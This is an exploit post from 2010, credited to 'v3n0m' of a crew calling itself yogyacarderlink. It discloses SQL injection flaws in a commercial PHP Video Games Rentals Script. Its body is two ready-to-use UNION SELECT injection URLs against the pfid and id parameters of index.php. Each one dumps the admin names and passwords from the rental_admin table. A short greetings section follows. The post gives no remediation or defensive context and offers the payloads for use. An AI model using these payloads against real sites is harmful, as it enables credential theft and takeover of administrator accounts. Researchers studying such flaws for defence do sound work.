-----------------------------------------------------------------------
Video Games Rentals Script Multiple SQL injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : November, 20-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
Application : Video Games Rentals Script
Price : $550
Vendor : http://www.commodityrentals.com/
Exploit & p0c
_____________
http://site/[path]/index.php?view=catalog&pfid=-9999+union+all+select+1,group_concat(admin_name,char(58),admin_password),3,4,5+from+rental_admin--
http://site/[path]/index.php?view=rentaldetail&item_type=G&id=-9999+union+all+select+1,2,group_concat(admin_name,char(58),admin_password),4,5,6+from+rental_admin--
ShoutZ
______
All YOGYACARDERLINK CREW, GheMaX, LeQhi, IdioT_InsidE
Also Jovita & Fabian :)